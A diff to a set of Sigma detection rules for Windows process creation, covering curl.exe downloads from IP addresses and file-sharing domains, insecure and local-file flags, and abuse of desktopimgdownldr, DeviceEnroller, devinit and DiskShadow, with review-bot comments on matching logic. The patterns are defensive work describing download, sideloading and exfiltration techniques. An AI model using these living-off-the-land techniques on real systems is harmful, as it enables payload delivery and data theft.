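Review bot: In the csvde hunk, `filter_import` is `CommandLine|contains: ' -i'`, which suppresses the alert whenever that substring occurs anywhere in the command line, not only as a standalone import flag; the same substring logic makes `selection_remote` match ` -f` embedded in an unrelated argument. Sigma `contains` is case-insensitive, so ` -I` is also treated as the import flag. If the exclusion is meant to be tight, a regex such as `CommandLine|re: \s-[iI](\s|$)` binds it to an actual flag; the intent behind the broad match is not documented in the rule, so a short comment either way would help.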
--- a/sigma/sysmon/process_creation/proc_creation_win_curl_cookie_hijacking.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_cookie_hijacking.yml @@ -1,8 +1,7 @@ title: Potential Cookies Session Hijacking id: 5a6e1e16-07de-48d8-8aae-faa766c05e88 status: experimental -description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie - data. +description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data. references: - https://curl.se/docs/manpage.html author: Nasreddine Bencherchali (Nextron Systems) @@ -18,11 +17,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - - CommandLine|re: \s-c\s - - CommandLine|contains: --cookie-jar + - CommandLine|re: \s-c\s + - CommandLine|contains: --cookie-jar condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_custom_user_agent.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_custom_user_agent.yml index 5deafafdf..526c72fc0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_custom_user_agent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_custom_user_agent.yml 
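Review bot: `CommandLine|re: \s-c\s` in `selection_cli` has no comment saying why a regex is used instead of `contains`; the commit adds exactly that note (`# Must be Regex as the flag needs to be case sensitive`) to the `\s-H\s` line in the custom User-Agent rule but not here, nor to `\s-k\s` in the insecure-connection hunk further down. Since Sigma `contains` is case-insensitive and `-C` / `-K` are distinct curl options, the reasoning is the same in all three places. Suggest appending the same comment to both remaining regex lines so the next maintainer does not "simplify" them back to `contains`.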
@@ -1,9 +1,7 @@ title: Curl Web Request With Potential Custom User-Agent id: 85de1f22-d189-44e4-8239-dc276b45379b status: experimental -description: Detects execution of "curl.exe" with a potential custom "User-Agent". - Attackers can leverage this to download or exfiltrate data via "curl" to a domain - that only accept specific "User-Agent" strings +description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv @@ -20,11 +18,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_header: - CommandLine|re: \s-H\s - CommandLine|contains: 'User-Agent:' + CommandLine|re: \s-H\s # Must be Regex as the flag needs to be case sensitive + CommandLine|contains: 'User-Agent:' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml index d2c79980c..c2fb33e46 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml @@ -1,8 +1,8 @@ title: File Download From IP URL Via Curl.EXE id: 9cc85849-3b02-4cb5-b371-3a1ff54f2218 related: - - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 - type: similar + - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 + type: similar status: experimental description: Detects file downloads directly from IP address URL using curl.exe references: 
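Review bot: In the custom User-Agent hunk, `selection_header` only accepts the short flag via `\s-H\s`, so an invocation that sets the header with the long form `--header` is not matched even though `User-Agent:` is present; the new comment explains the case-sensitivity of the regex but not this gap. Splitting the flag and the header value into two selections keeps `all of selection_*` working and adds the long form. Whether `-A`/`--user-agent` should also count as a custom User-Agent is a scoping choice for the rule author, and the referenced FIN7 IOCs are not visible here to check.
```yaml
selection_header_flag:
    - CommandLine|re: \s-H\s # Must be Regex as the flag needs to be case sensitive
    - CommandLine|contains: --header
selection_header_value:
    CommandLine|contains: 'User-Agent:'
# … unchanged: condition: process_creation and (all of selection_*) …
```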
@@ -22,19 +22,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output filter_main_ext: - CommandLine|endswith: + # Note: This filter exists to avoid duplication with 5cb299fc-5fb1-4d07-b989-0644c68b6043 + CommandLine|endswith: - .bat - .bat" - .dat diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml index 7948b4112..48ec40b21 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From IP Via Curl.EXE id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 status: experimental -description: Detects potentially suspicious file downloads directly from IP addresses - using curl.exe +description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv 
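Review bot: The new comment `# covers the alias for --remote-name and --output` on the `' -O'` entry is slightly misleading: `-O` is the alias for `--remote-name` only, and `-o` is the alias for `--output`; the entry covers both solely because Sigma `contains` matches case-insensitively. Suggest `# case-insensitive match: covers -O (--remote-name) and -o (--output)`. The same comment is added to the two sibling curl download hunks below, so the wording should be fixed in all three places.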
@@ -20,19 +19,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output selection_ext: - CommandLine|endswith: + # Note: If you add more extensions please consider adding them also in 9cc85849-3b02-4cb5-b371-3a1ff54f2218 + CommandLine|endswith: - .bat - .bat" - .dat diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml index 0081e1693..e60096c69 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From File Sharing Domain Via Curl.EXE id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb status: experimental -description: Detects potentially suspicious file download from file sharing domains - using curl.exe +description: Detects potentially suspicious file download from file sharing domains using curl.exe references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv 
@@ -20,11 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_websites: - CommandLine|contains: - - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ @@ -49,14 +48,14 @@ detection: - transfer.sh - ufile.io selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output selection_ext: - CommandLine|endswith: + CommandLine|endswith: - .ps1 - .ps1' - .ps1" diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_connection.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_connection.yml index 797c1972a..5eed1eb43 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_connection.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_connection.yml @@ -17,11 +17,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - - CommandLine|re: \s-k\s - - CommandLine|contains: --insecure + - CommandLine|re: \s-k\s + - CommandLine|contains: --insecure condition: process_creation and (all of selection_*) falsepositives: - Access to badly maintained internal or development systems diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml index 46b4ff317..3675033a9 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml @@ -1,8 +1,7 @@ title: Insecure Proxy/DOH Transfer Via Curl.EXE id: 2c1486f5-02e8-4f86-9099-b97f2da4ed77 status: experimental -description: Detects execution of "curl.exe" with the "insecure" flag over proxy or - DOH. +description: Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH. references: - https://curl.se/docs/manpage.html author: Nasreddine Bencherchali (Nextron Systems) @@ -18,10 +17,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - --doh-insecure - --proxy-insecure condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_local_file_read.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_local_file_read.yml index c3c926177..3c911faa7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_local_file_read.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_local_file_read.yml @@ -1,8 +1,7 @@ title: Local File Read Using Curl.EXE id: aa6f6ea6-0676-40dd-b510-6e46f02d8867 status: experimental -description: Detects execution of "curl.exe" with the "file://" protocol handler in - order to read local files. +description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files. references: - https://curl.se/docs/manpage.html author: Nasreddine Bencherchali (Nextron Systems) 
@@ -18,10 +17,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - CommandLine|contains: file:/// + CommandLine|contains: file:/// condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_susp_download.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_susp_download.yml index cdfea6fee..518992006 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_susp_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_susp_download.yml @@ -1,13 +1,12 @@ title: Suspicious Curl.EXE Download id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 related: - - id: bbeaed61-1990-4773-bf57-b81dbad7db2d - type: derived - - id: 9a517fca-4ba3-4629-9278-a68694697b81 - type: similar + - id: bbeaed61-1990-4773-bf57-b81dbad7db2d # Basic curl execution + type: derived + - id: 9a517fca-4ba3-4629-9278-a68694697b81 # Curl download + type: similar status: test -description: Detects a suspicious curl process start on Windows and outputs the requested - document to a local file +description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file references: - https://twitter.com/max_mal_/status/1542461200797163522 - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464 @@ -29,10 +28,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_curl: - - Image|endswith: \curl.exe - - Product: The curl executable + - Image|endswith: \curl.exe + - Product: The curl executable selection_susp_locations: - CommandLine|contains: + CommandLine|contains: - '%AppData%' - '%Public%' - '%Temp%' 
@@ -45,7 +44,7 @@ detection: - C:\ProgramData\ - C:\Windows\Temp\ selection_susp_extensions: - CommandLine|endswith: + CommandLine|endswith: - .dll - .gif - .jpeg @@ -57,14 +56,15 @@ detection: - .vbe - .vbs filter_optional_git_windows: + # Example FP + # CommandLine: "C:\Program Files\Git\mingw64\bin\curl.exe" --silent --show-error --output C:/Users/test/AppData/Local/Temp/gfw-httpget-jVOEoxbS.txt --write-out %{http_code} https://gitforwindows.org/latest-tag.txt ParentImage: C:\Program Files\Git\usr\bin\sh.exe Image: C:\Program Files\Git\mingw64\bin\curl.exe - CommandLine|contains|all: + CommandLine|contains|all: - '--silent --show-error --output ' - gfw-httpget- - AppData - condition: process_creation and (selection_curl and 1 of selection_susp_* and - not 1 of filter_optional_*) + condition: process_creation and (selection_curl and 1 of selection_susp_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml b/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml index 5f4fdba42..6a0451ff6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml 
@@ -1,9 +1,7 @@ title: Remote File Download Via Desktopimgdownldr Utility id: 214641c2-c579-4ecb-8427-0cf19df6842e status: test -description: Detects the desktopimgdownldr utility being used to download a remote - file. An adversary may use desktopimgdownldr to download arbitrary files as an - alternative to certutil. +description: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil. references: - https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html author: Tim Rauch @@ -22,7 +20,7 @@ detection: selection: Image|endswith: \desktopimgdownldr.exe ParentImage|endswith: \desktopimgdownldr.exe - CommandLine|contains: /lockscreenurl:http + CommandLine|contains: /lockscreenurl:http condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml index 2f6d11cd8..119da95aa 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Desktopimgdownldr Command id: bb58aa4a-b80b-415a-a2c0-2f65a4c81009 status: test -description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters - used to download files from the Internet +description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet references: - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ - https://twitter.com/SBousseaden/status/1278977301745741825 
@@ -21,14 +20,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: ' /lockscreenurl:' + CommandLine|contains: ' /lockscreenurl:' selection1_filter: - CommandLine|contains: + CommandLine|contains: - .jpg - .jpeg - .png selection_reg: - CommandLine|contains|all: + CommandLine|contains|all: - reg delete - \PersonalizationCSP condition: process_creation and (( selection1 and not selection1_filter ) or selection_reg) @@ -36,7 +35,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml b/sigma/sysmon/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml index 6beb3db2c..380a1de8e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml 
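Review bot: `selection1_filter` uses `CommandLine|contains` for `.jpg`, `.jpeg` and `.png`, so the exclusion fires on any occurrence of those substrings in the full command line, not only on the extension of the file referenced by `/lockscreenurl:`. If the intent is to exclude genuine image downloads, `CommandLine|endswith` (or a regex anchored to the URL argument) binds the exclusion to the actual target, at the cost of no longer excluding URLs that carry a query string after the extension; that trade-off deserves a short comment on the filter either way.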
@@ -1,16 +1,12 @@ title: Potential DLL Sideloading Via DeviceEnroller.EXE id: e173ad47-4388-4012-ae62-bd13f71c18a8 related: - - id: ee4c5d06-3abc-48cc-8885-77f1c20f4451 - type: similar + - id: ee4c5d06-3abc-48cc-8885-77f1c20f4451 + type: similar status: test -description: 'Detects the use of the PhoneDeepLink parameter to potentially sideload - a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". - - Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe - using this parameter - - ' +description: | + Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". + Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter references: - https://mobile.twitter.com/0gtweet/status/1564131230941122561 - https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html @@ -29,10 +25,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \deviceenroller.exe - - OriginalFileName: deviceenroller.exe + - Image|endswith: \deviceenroller.exe + - OriginalFileName: deviceenroller.exe selection_cli: - CommandLine|contains: /PhoneDeepLink + CommandLine|contains: /PhoneDeepLink condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_devinit_lolbin_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_devinit_lolbin_usage.yml index 2401e4d19..f8190c0c6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_devinit_lolbin_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_devinit_lolbin_usage.yml 
@@ -1,9 +1,7 @@ title: Arbitrary MSI Download Via Devinit.EXE id: 90d50722-0483-4065-8e35-57efaadd354d status: test -description: Detects a certain command line flag combination used by "devinit.exe", - which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows - system +description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system references: - https://twitter.com/mrd0x/status/1460815932402679809 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/ @@ -23,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t msi-install ' - ' -i http' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml index ab0615d92..d4e287a19 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Child Process Of ClickOnce Application id: 67bc0e75-c0a9-4cfc-8754-84a505b63c04 status: experimental -description: Detects potentially suspicious child processes of a ClickOnce deployment - application +description: Detects potentially suspicious child processes of a ClickOnce deployment application references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 author: Nasreddine Bencherchali (Nextron Systems) @@ -21,6 +20,7 @@ detection: selection: ParentImage|contains: \AppData\Local\Apps\2.0\ Image|endswith: + # Add more suspicious processes - \calc.exe - \cmd.exe - \cscript.exe 
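Review bot: The comment added inside the `Image|endswith:` list of the ClickOnce rule, `# Add more suspicious processes`, reads as an instruction rather than a note and does not say who is expected to act on it. The diskshadow rule later in this patch uses `# Note: add or remove additional binaries according to your org needs` for the same kind of list; suggest the same wording here for consistency.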
diff --git a/sigma/sysmon/process_creation/proc_creation_win_dirlister_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_dirlister_execution.yml index 5ba11fbea..4b42d81b6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dirlister_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dirlister_execution.yml @@ -1,9 +1,7 @@ title: DirLister Execution id: b4dc61f5-6cce-468e-a608-b48b469feaa2 status: test -description: Detect the usage of "DirLister.exe" a utility for quickly listing folder - or drive contents. It was seen used by BlackCat ransomware to create a list of - accessible directories and files. +description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files. references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md - https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/ @@ -22,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: DirLister.exe - - Image|endswith: \dirlister.exe + - OriginalFileName: DirLister.exe + - Image|endswith: \dirlister.exe condition: process_creation and selection falsepositives: - Legitimate use by users diff --git a/sigma/sysmon/process_creation/proc_creation_win_diskshadow_child_process_susp.yml b/sigma/sysmon/process_creation/proc_creation_win_diskshadow_child_process_susp.yml index ba973e7fc..709842d2b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_diskshadow_child_process_susp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_diskshadow_child_process_susp.yml 
@@ -1,18 +1,16 @@ title: Potentially Suspicious Child Process Of DiskShadow.EXE id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 related: - - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 - type: similar - - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location + type: similar + - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: Detects potentially suspicious child processes of "Diskshadow.exe". This - could be an attempt to bypass parent/child relationship detection or application - whitelisting rules. +description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules. references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration @@ -37,6 +35,7 @@ detection: selection: ParentImage|endswith: \diskshadow.exe Image|endswith: + # Note: add or remove additional binaries according to your org needs - \certutil.exe - \cscript.exe - \mshta.exe 
@@ -47,7 +46,6 @@ detection: - \wscript.exe condition: process_creation and selection falsepositives: - - False postitve can occur in cases where admin scripts levreage the "exec" flag - to execute applications + - False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml b/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml index 80c60fdf7..bf26363ff 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml 
@@ -1,21 +1,18 @@ title: Diskshadow Script Mode - Uncommon Script Extension Execution id: 1dde5376-a648-492e-9e54-4241dd9b0c7f related: - - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 - type: similar - - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location + type: similar + - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: 'Detects execution of "Diskshadow.exe" in script mode to execute an script - with a potentially uncommon extension. - +description: | + Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. Initial baselining of the allowed extension list is required. - - ' references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration 
@@ -38,17 +35,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: diskshadow.exe - - Image|endswith: \diskshadow.exe + - OriginalFileName: diskshadow.exe + - Image|endswith: \diskshadow.exe selection_flag: - CommandLine|contains: + CommandLine|contains: - '/s ' - '-s ' filter_main_ext: - CommandLine|contains: .txt + # Note: can be changed to an "endswith" to avoid rare FPs. But you need to account for quoted paths + # Note: Using the ".txt" is based on the MS documentation example. Best add the extension you use internally before using this rule + CommandLine|contains: .txt condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - False postitve might occur with legitimate or uncommon extensions used internally. - Initial baseline is required. + - False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml b/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml index 602cef9cc..1a7e48886 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml 
@@ -1,17 +1,16 @@ title: Diskshadow Script Mode - Execution From Potential Suspicious Location id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 related: - - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f - type: similar - - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution + type: similar + - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag - where the script is located in a potentially suspicious location. +description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration @@ -34,14 +33,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: diskshadow.exe - - Image|endswith: \diskshadow.exe + - OriginalFileName: diskshadow.exe + - Image|endswith: \diskshadow.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '/s ' - '-s ' selection_paths: - CommandLine|contains: + CommandLine|contains: + # Note: Add additional susp paths based on your org needs - :\Temp\ - :\Windows\Temp\ - \AppData\Local\ 
